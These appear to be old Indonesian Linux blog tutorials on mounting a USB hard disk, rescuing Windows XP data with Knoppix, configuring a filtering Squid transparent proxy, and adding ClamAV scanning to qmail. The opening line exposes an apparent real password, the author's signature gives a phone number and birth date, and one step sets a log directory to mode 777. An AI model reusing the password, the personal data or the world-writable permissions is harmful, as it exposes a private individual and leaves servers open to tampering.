Password:akusayangmama_:-p
root@iman# modprobe usb_storage
root@iman# modprobe usbcore
root@iman# modprobe uhci_hcd
root@iman# modprobe ehci_hcd

-

- Kalo perintah diatas keluar "FATAL: Module nama_module not found."
silahkan lihat config kernel anda, aktifkan module-module pendukung usb, lalu compile module nya :-(

3. Sentuhan Pertama dan periksa koneksi (Bukan Jaringan yach.... !!)
- Baca doa ... mudah2an berhasil ...
- silahkan alirkan listrik ke badannya ... koq badan sih... maaf.. hidupkan power usb hdd external nya :D
- udah hidup? Atur nafas... nah... sekarang masukkan perlahan2 tapi pasti... ke lubang itu loh... (Awas... jangan piktor !! )
- sekarang periksa apakah sudah ke detect ato belom? (detik-detik penuh kecemasan)
-

root@iman# dmesg
usb 1-1: new full speed USB device using address 3
scsi1 : SCSI emulation for USB Mass Storage devices
Vendor: Maxtor 6 Model: Y080L0 Rev: 0 0
Type: Direct-Access ANSI SCSI revision: 02
SCSI device sda: 160086528 512-byte hdwr sectors (81964 MB)
sda: assuming drive cache: write through
/dev/scsi/host1/bus0/target0/lun0: p1 p2 p3 < p5 p6 >
Attached scsi disk sda at scsi1, channel 0, id 0, lun 0
Attached scsi generic sg0 at scsi1, channel 0, id 0, lun 0, type 0
USB Mass Storage device found at 3

- **fiiuuuhhh ...** (menghela nafas) ... ternyata kedetect... :-D
- sekarang posisi hdd external anda telah dikenal sebagai sda ^_^

4. Membagi partisi & format
- masuk ke fdisk /dev/sda, lalu bagi sesuai kebutuhan anda.
Disini aku bagi menjadi 4 partisi dimana 2 partisi dengan ext3 dan 2 lagi sebagai vfat.

-

root@iman# fdisk /dev/sda
Device Boot Start End Blocks Id System
/dev/sda1 1 2615 21004956 83 Linux
/dev/sda2 2616 5230 21004987+ 83 Linux
/dev/sda3 5231 9964 38025855 5 Extended
/dev/sda5 5231 7845 21004956 b W95 FAT32
/dev/sda6 7846 9964 17020836 b W95 FAT32

- Setelah partisi dibagi & diberi type nya ... silahkan keluar, huss... huss .. hus... :D
- Saatnya memformat partisi tersebut (perhatikan pada sda berapa partisi linux anda)

-

root@iman# mkfs.ext3 /dev/sda1
mke2fs 1.35 (28-Feb-2004)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
2627520 inodes, 5251246 blocks
262562 blocks (5.00%) reserved for the super user
First data block=0
161 block groups
32768 blocks per group, 32768 fragments per group
16320 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done
Creating journal (8192 blocks): done
Writing superblocks and filesystem accounting information: done

-

5. Mount partisi
- buat direktory tempat me-mount partisi dari hdd external anda, lalu mount partisi tersebut

-

root@iman# mkdir /mnt/sda1
root@iman# mkdir /mnt/sda2
root@iman# mount /dev/sda1 /mnt/sda1
root@iman# mount /dev/sda2 /mnt/sda2

- Anda mau partisi2 tersebut mount secara automount saat booting ataupun saat di colokin?
Gih Baca lagi artikelnya mas idban ... Ok.... :D
- Jangan terlalu banyak terguncang pada saat hdd hidup ya...!!!

- Salam dari Medan

6. Referensi
Flashdisk - Idban Secandri
Man fdisk
Man mount
Man lsmod
Man modprobe
Man mkfs.ext3
Man si Iman a_ir_hrp .... hehehehe :D

SELAMAT MENCOBA

Salam dari Medan City .....

-------------------------------------------------------------------------------------------
<<--I.R-Harahap-Medan -->>
Aku bukanlah orang yang merasa pandai :-(
Aku selalu menganggap diriku orang yg kekurangan :-(
Dgn kekurangan itulah aku mau belajar agar bisa pandai ^_^
-------------------------------------------------------------------------------------------
- a_ir_hrp
- 081-361-305-777
- Feb, 15 1981
- My site http://iman.medanlinux.com
- Aku Cuman Seorang Manusia biasa
Cara penggunaan device ini sangat mudah seperti menggunakan Flashdisk..... (Ref. Baca artikel mas Idban Secandri ttg Flashdisk )
Nb. 1. Diasumsikan bahwa hdd tsb masih perawan ... eeehhh.... salah.. maaf.. masih belum di bagi atau di format partisinya .. :D
2. Hdd yang digunakan adalah jenis Hdd PC biasa Maxtor 80 Gb 7200rpm.
3. Di ujicoba ditempat yang sangat menyedihkan dengan mesin Slackware 10 - kernel-2.6.8 :-(

Menyelamatkan data di Windows XP dengan linux Knoppix

2005-03-07T05:06:00.000-08:00

Tidak terasa teknologi komputer semakin berkembang, sistem operasi juga semakin banyak mulai dari dos, windows 9x, windows NT, windows XP, OS2, MacOS, Unix, Linux. linux saat ini sangat banyak pengembangnya di site www.distrowatch.com tercatat lebih dari 100 distro, mulai dari distro seperti redhat, fedora, suse, mandrake, debian. perkembangan terakhir distro linux, saat ini mulai banyak dilirik media alternatif selain di install di hardisk PC, yaitu linux live CD dengan linux live cd kita bisa memakai linux tanpa harus menginstall nya. tinggal masukan ke cd-rom drive dan boot ke cd...dan anda telah memakai linux. pelopor linux live cd knoppix dibuat oleh Klaus Knopper dari jerman http://www.knoppix.net. mendapatkan linux knoppix juga sangat mudah download di www.knoppix.net, atau mirror nya di http://kambing.vlsm.org/debian-cd/knoppix/, atau beli di toko cd, beli infolinux.

Banyak di antara kita yang masih memakai windows untuk dirumah, dikantor, di warnet. terlepas dari windows tersebut bajakan atau bukan. Suatu saat windows bisa crash, currupt, tidak bisa di boot, kalau sudah begini baru pusing untuk menyelamat kan data. Untuk windows 95, windows98, windows ME. kita masih bisa memakai disket boot dos dan membaca isi drive nya karena masih memakai file system FAT yang masih bisa dibaca oleh dos. Sedangkan windows NT, 2000, XP kalau memakai file-system NTFS tidak akan bisa dibaca oleh disket dos. jadi menyelamatkan system atau data di file-system NTFS cukup sulit, apalagi jika windows tidak memberi kesempatan kita untuk masuk ke konsol atau pun ke desktop.

Salah satu cara yang mudah untuk memnyelamatkan data dengan menggunakan linux live-cd seperti cd knoppix. setelah kita bisa menjalankan knoppix kita bisa membackup data ke komputer file server, komputer orang lain sementara windows nya bisa kita utak-atik. berikut ini step by step untuk rescue windows XP dengan Linux Knoppix.

Buat komputer untuk bisa boot ke cd, caranya masuk ke bios pada saat boot tekan "del" pada notebook biasanya F2, cari boot squence biasanya di bagian advance (bios ami, award kecuali md intel). Buat first boot ke CD.

Pasang CD Knoppix di cdrom drive

Tunggu kira-kira 5 menit akan masuk ke desktop linux knoppix. kalau gagal, pada saat lilo (boot loader linux) ketik F2 akan masuk ke boot option. kalau vga card tidak mendukung atau memory kurang, coba masuk ke tesk mode dengan boot option "knoppix 2"

Setelah di desktop linux masuk ke menu Knoppix -> Network -> network configuration. kalau jaringan memakai dhcp tekan ok. kalau tidak tekan no, kemudian masukan IP address, DNS, Gateway (yang terpenting adalah IP address). Atau kalau tidak berhasil ke desktop, coba boot ke text mode, di console ketik "netcardconfig", kemudian masukan ipaddress, coba ping ke komputer teman, server.

Coba browse network komputer dengan perintah "smbclient -L nama-komputer", kalau meminta password tekan saja enter (kalau kita yakin komputer yang share tidak di password). Buat direktory mount untuk samba-share "mkdir /mnt/samba-share" Kemudian buka network share yang akan di jadikan backup dengan perintah "smbmount //nama-komputer/nama-share /mnt/samba-share" kalau di share tersebut di password tambahkan option "username=***" "passowrd=***".

Mount hardisk local dengan perintah "mount /mnt/hda1" (primary master, partisi pertama), "mount /mnt/hda5 (primary master, partisi logikal pertama).

Buka program mc (Midnight Commander) dengan perintah "mc" sangat mirip dengan Norton commander jaman dos dahulu kala, kemudian di sebelah kiri bisa dibuka /mnt/hda1, disebelah kanan /mnt/samba-share. select dengan "insert" dan copy "F5" file-file yang ingin di backup (hilangkan check "preserve Attributes" untuk tidak mengganti atribut file yang backup). Kalau ada ftp sever bisa gunakan "FTP link" misalnya kita mau back up ke ftp server "ftp.server.co.id" dengan user=gue password=passgue, di direktory pub/backup masuk ke menu Right -> FTP link kemudian keluar FTP to machine (tekan F1 untuk melihat contohnya) ketikan /#ftp:gue:passgue@ftp.server.co.id/pub/backup.

Setelah selesai membackup file kita bisa mengoprek windows XP nya. kalau prlu di format juga boleh, file-file penting kita telah selamat.

Catatan terakhir, bisa juga digunakan linux live-cd yang lain misalnya Mandrake-Move (tidak ada mc), Slax, Gnoppix, suse-livecd, dll, atau gunakan distro usb-flash seperti RUNT jika kita punya komputer yang bisa boot dari USB. Knoppix versi 3.1 3.2 mc nya suka error jika mengcopy banyak file. jadi gunakan versi 3.3, 3.4 atau yang terbaru 3.7.

Linux Knoppix membuka partisi NTFS dengan readonly, kalau FAT bisa read-write. linux dengan kernel 2.6 bisa membuka NTFS dengan read-write tetapi di live cd knoppix sepertinya belum bisa (saya tidak tahu pasti).

Kurniadi (kurniadi@patrakom.co.id)

Instalasi Squid, Banner Filter, Porn Filter, Limit Bandwith, Transparan Proxy

2005-03-07T05:04:00.000-08:00

Sebelum menginstall alangkah baiknya siapkan satu pak rokok (A Mild) dan makanan ringan :) . Dokumen ini ditujukan untuk membantu membuat sebuah proxy server. Sistem Operasi yang digunakan adalah Redhat Linux 7.2. Semua paket tersebut menggunakan format source tarball. Tidak ada copyright apapun dalam dukumen ini, anda bebas menyalin, mencetak, maupun memodifikasi (dengan menyertakan nama penulis asli). Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. Semoga bermanfaat dan memajukan opensource software di Indonesia.

Pastikan login pada server anda adalah sebagai root

1. Instalasi Banner Filter
Penempatan direktori Banner Filter harus didalam direktori www kita. misal saya di /usr/local/apache/htdocs .download souce Banner Filter di http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz

[root@PROXY hanny]# wget http://phroggy.com/files/unix/bannerfilter-1.21.tar.gz

Ekstrak source bannerfilter-1.21.tar.gz :
[root@PROXY hanny]# tar -xzvf bannerfilter-1.21.tar.gz

Kemudian pindahkan hasil exstrak bannerfilter-1.21.tar.gz ke dalam /usr/local/apache/htdocs
[root@PROXY hanny]# mv bannerfilter-1.21 /usr/local/apache/htdocs/bannerfilter
[root@PROXY hanny]# cd /usr/local/apache/htdocs/bannerfilter

Edit file bannerfilter.conf
[root@PROXY bannerfilter]# mv bannerfilter.conf /etc
[root@PROXY bannerfilter]# vi /etc/bannerfilter.conf

Contoh isi bannerfilter.conf saya :
# Path to the directory containing the data files:
$DATA='/usr/local/apache/htdocs/bannerfilter';

# URL of the directory containing the HTML and graphics files
# (this must be accessible by the machine running Squid; it does
# not need to be accessible to the client machines):
$WWW='http://www.rsds.or.id/bannerfilter/www';

# Path to the banner log file if you want one, or leave empty (if
# specified, Squid must have write access to this file):
$LOG='';

# $LOG='/tmp/bannerlog.txt';
# If you prefer not to see "Blocked", use null.gif instead of
# banner.gif:
$BANNERGIF='banner.gif';

Penambahan script bannerfilter nantinya akan diletakan didalam squid.conf
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl

2. Instalasi Squid
Sebelum installasi squid, pastikan daemon squid yang asli dari redhat harus anda stop atau musnahkan !!
caranya :
[root@PROXY hanny]# /etc/rc.d/init.d/squid stop
[root@PROXY hanny]# for a in `rpm -qa | grep squid`; do rpm -e --nodeps $a; done

Sekarang kita mendownload source squid. Saya menggunakan squid-2.5.STABLE2
Download source squid di http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz

[root@PROXY hanny]# wget http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE2.tar.gz

Ekstrak source squid-2.5.STABLE2.tar.gz :
[root@PROXY hanny]# tar -xzvf squid-2.5.STABLE2.tar.gz
[root@PROXY hanny]# cd squid-2.5.STABLE2

Buat user untuk menjalankan squid, nama usernya adalah squid
Guna meningkatkan keamanan server kita, maka user squid tidak bisa digunakan untuk login
[root@PROXY squid-2.5.STABLE2]# useradd -d /usr/local/squid/ -r -s /dev/null squid > /dev/null 2>&1

Kompilasi dan install Squid :
[root@PROXY squid-2.5.STABLE2]# ./configure --prefix=/usr/local/squid --exec-prefix=/usr/local/squid > --enable-delay-pools --enable-cache-diggests --enable-poll > --disable-ident-lookups --enable-async-io=16 > --enable-auth-modules --enable-removal-policies --enable-snmp

[root@PROXY squid-2.5.STABLE2]# make all
Biasanya proses make all ini berlangsung lama, alangkah baiknya kita ambil sebatang rokok lalu di bakar :) betapa indahnya dunia ini !!

[root@PROXY squid-2.5.STABLE2]# make install

Sekarang kita masuk dalam tahap meng-edit konfigurasi ke dalam file squid.conf
[root@PROXY squid-2.5.STABLE2]# cd /usr/local/squid/etc

Anda bisa membaca terlebih dahulu http://www.squid-cache.org/Doc/FAQ/FAQ.html (Ambil sebatang rokok lagi agar ketegangan anda mereda !!)
Dalam meng-edit konfigurasi squid, anda bisa membaca readme yang sudah ada di dalam file squid.conf atau anda juga bisa melihat atau mengambil, file yang sudah saya edit http://www.rsds.or.id/linux/squid.conf.hanny

[root@PROXY etc]# wget http://www.rsds.or.id/linux/squid.conf.hanny
[root@PROXY etc]# vi squid.conf.hanny

kemudian carilah kata-kata dalam file squid.conf.hanny seperti keterangan dibawah ini yang berhurup bold italic :
ftp_user name@domain-anda.com
dns_nameservers IP-Address-DNS-ISP-Anda
acl user src 192.168.0.0/255.255.255.0
(ip192.168.0.0 adalah ranges ip address client kita mulai 192.168.0.0 sampai 192.168.0.255)

Didalam file squid.conf.hanny, sudah saya tambahkan script untuk menjalankan Banner Filter dan Porn Filter :
redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
acl porn url_regex "/usr/local/squid/etc/porn.txt"
http_access deny porn

"Jika anda tidak menginginkan Banner Filter atau Porn Filter berjalan, maka pada awal script Banner Filter atau Porn Filter dalam file squid.conf.hanny harus di beri tanda " # " :
#redirect_program /usr/local/apache/htdocs/bannerfilter/redirector.pl
#acl porn url_regex "/usr/local/squid/etc/porn.txt"
#http_access deny porn

3. Limit Bandwith
Dalam file squid.conf.hanny, juga sudah saya tambahkan script untuk menggunakan delay pool :

#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
delay_class 1 2
#-1/-1 mean that there are no limits
delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
delay_parameters 2 5000/150000 5000/120000
delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------

"Jika anda tidak menginginkan Limit Bandwith berjalan, maka pada awal script delay poll dalam file squid.conf.hanny harus diberi tanda " # "
#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
#acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
#delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
#delay_class 1 2
#-1/-1 mean that there are no limits
#delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
#delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
#delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
#delay_parameters 2 5000/150000 5000/120000
#delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------

Merubah nama file squid..conf yang asli dari komputer anda ke nama file lain. (sebagai back-up)
Dan merubah squid.conf.hanny menjadi squid.conf
[root@PROXY etc]# mv squid.conf squid.conf.punyaku
[root@PROXY etc]# mv squid.conf.hanny squid.conf

4. Instalasi Porn Filter
Buatlah terlebih dahulu file dengan nama porn.txt
[root@PROXY etc]# touch porn.txt

Isikan file porn.txt dengan site-site yang hendak anda tutup, misal www.17tahun.com
[root@PROXY etc]# vi porn.txt
isikan dengan kata 17tahun

Menjalankan squid
Memberi hak direktori squid dan bannerfilter agar proses berjalan lancar :
[root@PROXY etc]# chown -R squid.squid /usr/local/squid
[root@PROXY etc]# chown -R squid.squid /usr/local/apache/htdocs/bannerfilter

Aktifkan cache squid anda terlebih dahulu:
[root@PROXY etc]# /usr/local/squid/sbin/squid -z

Jika muncul permission denied pada saat pembuatan cache, cek dulu owner dan permission untuk directory cache :
[root@PROXY etc]# chmod 777 /usr/local/squid/var/logs/

Sampai tahap ini jika ada pesan error mohon email ke hanny@rsds.or.id

Jalankan daemon squid anda :
[root@PROXY etc]# /usr/local/squid/sbin/squid

Cek squid anda apakah jalan atau tidak :
[root@PROXY etc]# netstat -pln | grep squid
tcp 0 0 0.0.0.0 :8080 0.0.0.0:* LISTEN 777/(squid)
udp 0 0 0.0.0.0 :32771 0.0.0.0:* 777/(squid)
udp 0 0 0.0.0.0 :3130 0.0.0.0:* 777/(squid)

Jika keluar seperti hal diatas, maka squid anda telah berjalan !! rokokan dulu ah...: )

Test Squid Dari Komputer Client
Lakukan penge-test ping antar network anda, misal server anda mempunyai ip 192.168.0.1 dan ip windows client anda 192.168.1.2 :
[root@PROXY etc]# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) from 192.168.0.1 : 56(84) bytes of data.
Warning: time of day goes back, taking countermeasures.
64 bytes from 192.168.0.2: icmp_seq=0 ttl=255 time=233 usec
64 bytes from 192.168.0.2: icmp_seq=1 ttl=255 time=161 usec

Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer coba isikan proxy dengan ip server anda dan port 8080 (misal ip server saya 192.168.0.1 maka pengisian proxy adalah 192.168.0.1 : 8080)

Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com

1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.

2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt

3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.

5. Transparan Proxy
Agar lebih mudah kita akan menggunakan iptables
[root@PROXY hanny]# /sbin/iptables -F -t nat
[root@PROXY hanny]# /sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 > --dport 80 -j DNAT --to 192.168.0.1:8080

keterangan iptables diatas :
1. eth1 adalah interface lancard untuk ip gateway client.
2. 192.168.0.0/255.255.255.0 adalah ip client kita mulai dari 192.168.0.0 sampai 192.168.0.255.
3. --dport 80 -j DNAT --to 192.168.0.1:8080 adalah bila ada request port 80 (biasanya browsing), akan di paksa masuk ke squid dengan ip 192.168.0.1 port 8080.

Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer, pastikan tidak terisi proxy. Dan pastikan pengisian ip client dan ip gateway client anda adalah benar adanya !!!
(Misal ip client saya mempunyai ip 192.168.0.2 dan ip gateway 192.168.0.1)

Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com

1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.

2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt

3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.

Autorun Squid dan Transparan Proxy
Bila server squid kita restart dan kita tidak ingin mengulangi command2x seperti hal-hal pada artikel di atas, maka masukan script pada /etc/rc.local :
[root@PROXY hanny]# vi /etc/rc.local

isikan dengan :
#Menjalankan Transparan Proxy
/sbin/iptables -F -t nat
/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 --dport 80 -j DNAT --to 192.168.0.1:8080

#Menghidupkan Squid
/bin/rm /usr/local/squid/var/logs/squid.pid
/usr/local/squid/sbin/squid

6. Lain-Lain
Bila kita inggin melihat siapa saja yang sedang mengunakan squid kita dan situs-situs apa saja yang mereka buka, anda bisa menggunakan:
[root@PROXY hanny]# tail -f /usr/local/squid/var/logs/access.log

Bila anda merubah isi file squid.conf dan ingin mencoba apakah squid.conf yang kita rubah bisa sesuai yang kita inginkan :
[root@PROXY hanny]# /usr/local/squid/sbin/squid -k reconfigure

7. ChangeLog
24 Maret 2003
Penambahan permission pada direktory cache (dani@bisnisweb.com)

24 Maret 2003
Penulisan tutorial ini dimulai (hanny@rsds.or.id)

8. Referensi
1. http://www.squid-cache.org/
2. http://www.tldp.org/HOWTO/mini/TransparentProxy.html
3. http://jateng.linux.or.id/index.html
4. http://netfilter.samba.org/
5. http://phroggy.com/bannerfilter/

9. Ucapan Terima Kasih
1. Kepada asfik , sunar , dani sebagai awal dari penginstallan squid saya.
2. Kepada channel #indolinux server dal.net dan efnet.net sebagai komunitas linux.

Antivirus dengan qmail-scanner dan clam antivirus pada qmail

2005-03-07T04:47:00.001-08:00

Diasumsikan diserver anda telah telah terpasang qmail yang sudah dipatch menggunakan qmail-queue patch dari Bruce Guenter ( http://www.qmail.org/qmailqueue-patch) . Tutorial ini disusun menggunakan distro Redhat Linux 7.3 dan mungkin juga bisa anda coba pada distro yang lain. Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas atau langsung join ke channel #indolinux di EFnet. Terima Kasih.

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).
1. Instal clam antivirus

Clam antivirus ( http://clamav.elektrapro.com) merupakan software antivirus yang berlisensi GNU GPL 2 dengan menggunakan database virus dari OpenAntiVirus ( http://www.openantivirus.org). Download, ekstrak dan ganti direktori ke source clam antivirus :

[root@wedus src]# wget http://clamav.elektrapro.com/stable/clamav-0.54.tar.gz
[root@wedus src]# tar -xzvf clamav-0.54.tar.gz
[root@wedus src]# cd clamav-0.54

Buat user dan group yang akan menjalankan daemon clam anvirus :

[root@wedus clamav-0.54]# groupadd clamav
[root@wedus clamav-0.54]# useradd -g clamav -s /bin/false -c "Clam AntiVirus" clamav

Lakukan kompilasi dan install :

[root@wedus clamav-0.54]# ./configure
[root@wedus clamav-0.54]# make
[root@wedus clamav-0.54]# make install

Pindah file konfigurasi standar dari clam antivirus ke nama file yang lain, karena kita akan menyusun sendiri file konfigurasi tersebut :

[root@wedus clamav-0.54]# mv /usr/local/etc/clamav.conf /usr/local/etc/clamav.conf.default

Buatlah file /usr/local/etc/clamav.conf isinya :

LogFile /tmp/clamd.log
LogFileMaxSize 2M
LogVerbose
LogTime
PidFile /var/run/clamd.pid
DataDirectory /usr/local/share/clamav
LocalSocket /tmp/clamd
MaxDirectoryRecursion 15
User clamav
ScanArchive
ArchiveMaxFileSize 10M
ArchiveMaxRecursion 5
ArchiveMaxFiles 1000

Jalankan daemon clam antivirus (clamd ) :

[root@wedus clamav-0.54]# clamd

Periksa apakah daemon tersebut sudah berjalan seperti yang kita inginkan :

[root@wedus clamav-0.54]# ps axu | grep clamd
clamav 29192 0.0 4.7 9120 5984 ? S 11:06 0:00 clamd
clamav 29193 0.0 4.7 9120 5984 ? S 11:06 0:00 clamd
clamav 29194 0.0 4.7 9120 5984 ? S 11:06 0:00 clamd

Untuk menjalankan daemon clamd setiap server di reboot :

[root@wedus clamav-0.54]# echo /usr/local/sbin/clamd >> /etc/rc.local

Tanpa berpindah dari direktori source clam antivirus, lakukan test dengan cara menscan direktori test :

[root@wedus clamav-0.54]# clamscan -r test

Kemudian download update database virus yang paling baru :

[root@wedus clamav-0.54]# freshclam

Jika sudah selesai kemudian kita jalankan daemon proses update database virus tersebut secara otomatis (akan dilaksanakan pengecekan database virus yang paling baru 2 kali dalam sehari ) :

[root@wedus clamav-0.54]# touch /var/log/clam-update.log
[root@wedus clamav-0.54]# chmod 644 /var/log/clam-update.log
[root@wedus clamav-0.54]# chown clamav /var/log/clam-update.log

Jalankan daemonnya (freshclam ):

[root@wedus clamav-0.54]# freshclam -d -c 2 -l /var/log/clam-update.log

Untuk menjalankan daemon freshclam jika server di reboot :

[root@wedus clamav-0.54]# echo "freshclam -d -c 2 -l /var/log/clam-update.log" >> /etc/rc.local
2. Instal Module Perl Time::HiRes dan DB_FIle

Anda bisa mendapatkan module perl Time::HiRes tersebut yang paling baru melalui http://search.cpan.org/search?module=Time::HiRes, atau anda bisa langsung mendownload di lokal mirror CPAN di Indonesia (terima kasih kepada ISP CBN), download, ekstrak, dan kompilasi :

[root@wedus src]# wget ftp://ftp.cbn.net.id/mirror/CPAN/authors/id/J/JH/JHI/Time-HiRes-1.42.tar.gz
[root@wedus src]# tar -xzvf Time-HiRes-1.42.tar.gz
[root@wedus src]# cd Time-HiRes-1.42
[root@wedus Time-HiRes-1.42]# perl Makefile.PL
[root@wedus Time-HiRes-1.42]# make
[root@wedus Time-HiRes-1.42]# make install

Atau, anda juga bisa menggunakan CPAN auto-install sebagai berikut untuk menginstal module perl Time::HiRes tersebut :

[root@wedus src]# perl -MCPAN -e "install Time::HiRes"

Lakukan juga langkah seperti tersebut diatas untuk module DB_File.
3. Instal maildrop

Yang dibutuhkan oleh qmail-scanner dari paket maildrop sebenarnya adalah program reformime. Download, ekstrak, kompilasi dan install :

[root@wedus src]# wget http://unc.dl.sf.net/courier/maildrop-1.5.2.tar.bz2
[root@wedus src]# tar -jxvf maildrop-1.5.2.tar.bz2
[root@wedus src]# cd maildrop-1.5.2
[root@wedus maildrop-1.5.2]# ./configure
[root@wedus maildrop-1.5.2]# make
[root@wedus maildrop-1.5.2]# make install
4. Instal tnef unpacker

Tnef unpacker digunakan untuk menguraikan attachment MS-TNEF MIME yang digunakan oleh Microsoft mail server.

[root@wedus src]# wget http://unc.dl.sf.net/sourceforge/tnef/tnef-1.2.0.tar.gz
[root@wedus src]# tar -xzvf tnef-1.2.0.tar.gz
[root@wedus src]# cd tnef-1.2.0
[root@wedus tnef-1.2.0]# ./configure
[root@wedus tnef-1.2.0]# make
[root@wedus tnef-1.2.0]# make install
5. Instal perl-suidperl

Karena pada default distribusi RedHat 7.3 tidak menyertakan program perl-suidperl, maka kita perlu menginstal program tersebut (hal ini mungkin bisa anda temui jika anda tidak menginstal program tersebut pada file /var/log/qmail/smtpd/current akan terdapat error Can't do setuid atau jika di server lokal akan anda dapatkan error 451_qq_temporary_problem_(#4.3.0) ) :

[root@wedus src]# wget ftp://rpmfind.net/linux/redhat/7.3/en/os/i386/RedHat/RPMS/perl-suidperl-5.6.1-34.99.6.i386.rpm
[root@wedus src]# rpm -ivh perl-suidperl-5.6.1-34.99.6.i386.rpm
6. Instal qmail-scanner

Download, ekstrak source qmail-scanner yang paling baru :

[root@wedus src]# wget http://unc.dl.sourceforge.net/sourceforge/qmail-scanner/qmail-scanner-1.16.tgz
[root@wedus src]# tar -xzvf qmail-scanner-1.16.tgz

Ganti direktori ke source qmail-scanner kemudian lakukan konfigurasi :

[root@wedus src]# cd qmail-scanner-1.16
[root@wedus qmail-scanner-1.16]# ./configure

Jika sukses, script configure akan menemukan path program yang dibutuhkan oleh qmail-scanner dan clam antivirus, misalnya :

....
mimeunpacker=/usr/local/bin/reformime
uudecode=/usr/bin/uudecode
unzip=/usr/bin/unzip
tnef=/usr/local/bin/tnef
clamscan=/usr/local/bin/clamscan
scanners="clamscan_scanner"
....

Buat direktori yang akan digunakan oleh qmail-scanner :

[root@wedus qmail-scanner-1.16]# mkdir -p /var/spool/qmailscan/quarantine/{tmp,cur,new}
[root@wedus qmail-scanner-1.16]# mkdir -p /var/spool/qmailscan/working/{tmp,cur,new}
[root@wedus qmail-scanner-1.16]# mkdir -p /var/spool/qmailscan/archive/{tmp,cur,new}

Salin file quarantine-attachments.txt ke direktori /var/spool/qmailscan :

[root@wedus qmail-scanner-1.16]# cp quarantine-attachments.txt /var/spool/qmailscan/

Ubah kepemilikan dari direktori /var/spool/qmailscan :

[root@wedus qmail-scanner-1.16]# chown -R qmailq:qmail /var/spool/qmailscan/

Salin file qmail-scanner-queue.pl ke direktori /var/qmail/bin :

[root@wedus qmail-scanner-1.16]# cp qmail-scanner-queue.pl /var/qmail/bin/qmail-scanner-queue.pl

Ganti kepemilikan dan mode dari file qmail-scanner-queue.pl tersebut :

[root@wedus qmail-scanner-1.16]# chown qmailq:qmail /var/qmail/bin/qmail-scanner-queue.pl
